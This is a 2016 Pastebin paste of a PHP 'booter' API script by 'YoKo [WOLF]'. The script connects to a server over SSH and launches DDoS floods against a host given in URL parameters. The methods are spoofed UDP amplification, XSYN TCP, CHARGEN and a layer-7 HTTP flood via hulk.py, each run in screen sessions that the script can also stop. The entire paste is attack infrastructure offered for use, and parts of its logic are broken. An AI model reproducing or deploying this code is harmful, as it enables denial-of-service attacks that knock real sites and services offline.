Advertisement
Guest User

STOP ATTACK API BOOTER

a guest
Oct 15th, 2016
508
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.91 KB | None | 0 0
  1. STOP ATTACK BY WOLF / YOKO
  2. <?php
  3. //Stop Attack Script re-coded by YoKo [WOLF]
  4. //Administator of Rebel Security, but closed now.
  5. //Have fun and please like.
  6. //PLEASE DONT GET A LEECHER fkg skid.
  7. ignore_user_abort(true);
  8. set_time_limit(0);
  9. function SendAttack($ip, $root, $password, $cmd1, $cmd2, $stop, $stopAtk) {
  10. if(!($con = ssh2_connect($ip, 22))){
  11. echo "Connection Error, restart server ?";
  12. } else {
  13. if(!ssh2_auth_password($con, $root, $password)) {
  14. echo "Error: Bad Login, verify info."; //Start to send command.
  15. }
  16. else
  17. {
  18. if($stop)//detect if stop is declared.
  19. {
  20. if (!($stream = ssh2_exec($con, $stopAtk ))) { echo "unknow cmd stop userid."; }
  21. else { stream_set_blocking($stream, false);
  22. $data = "";
  23. while ($buf = fread($stream,4096)) {
  24. $data .= $buf;
  25. } echo "Attack Stopped.";
  26. }
  27. }
  28. }
  29. else
  30. {
  31. if (!($stream = ssh2_exec($con, $cmd1 ))) {
  32. echo "Error: Unable to Execute Command\n";
  33. } else {
  34. if (!($stream = ssh2_exec($con, $cmd2 ))) {
  35. echo "please check 'yum install screen' or 'yudo apt-get screen'";
  36. }
  37. else { stream_set_blocking($stream, false);
  38. $data = "";
  39. while ($buf = fread($stream,4096)) {
  40. $data .= $buf;
  41. echo "Attack send.";
  42. }
  43. }
  44. }
  45. }
  46. }
  47. }//close function
  48. //attack method, et il ne sert a rien d'en mettre plus de 4, saturation inutile du server.
  49. $udp = "./amp ".$host." list.txt 1 -1 ".$time; //amplifier une attack udp spoof
  50. $xsyn = "./xsyn ".$host." ".$port." 1 ".$time;//alternative TCP Flood.
  51. $layer7 = "timeout ".$time." python hulk.py http://".$host." safe";//HTTP Atk
  52. $chargen = "./chargen ".$host." ".$port." xudp.txt 1 -1 ".$time;//tres bon script pour l'xudp.
  53. //End of attack method
  54. $ip = "IP Server";
  55. $root = "Root Username";
  56. $password = "Password";
  57. global $stop;
  58. $host = $_GET['host'];
  59. $port = $_GET['port'];
  60. $time = $_GET['time'];
  61. $method = htmlspecialchars(htmlentities(strtoupper($_GET['method'])));
  62. $username = $_GET['username'];//lanceur de l'attaque.
  63. $attackId = $username.$_GET['userAtk'] + 1;//nombre d'attaque deja lancer par l'user.
  64. $cmd3 = "screen -dmS ".$attackId; //pseudo + nombre d'atk en cour.
  65. $stopAtk = "screen -XS ".$attackId." quit";
  66. //---Setup Atk----
  67. if ($method == "UDP") {
  68. $cmd1 = $udp;
  69. $cmd2 = $cmd3;
  70. }
  71. if ($method == "XSYN") {
  72. $cmd1 = $udp;
  73. $cmd2 = $cmd3;
  74. }
  75. if ($method == "CHARGEN") {
  76. $cmd1 = $udp;
  77. $cmd2 = $cmd3;
  78. }
  79. if ($method == "LAYER7") {
  80. $cmd1 = $layer7;
  81. $cmd2 = $cmd3;
  82. }
  83. if(!empty($username))
  84. {
  85. die('Please type username for send attack, or server saturation.');
  86. } else {
  87. SendAttack($ip, $root, $password, $cmd1, $cmd2, $stopAtk);
  88. //Start Attack Stuff.
  89. }
  90. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement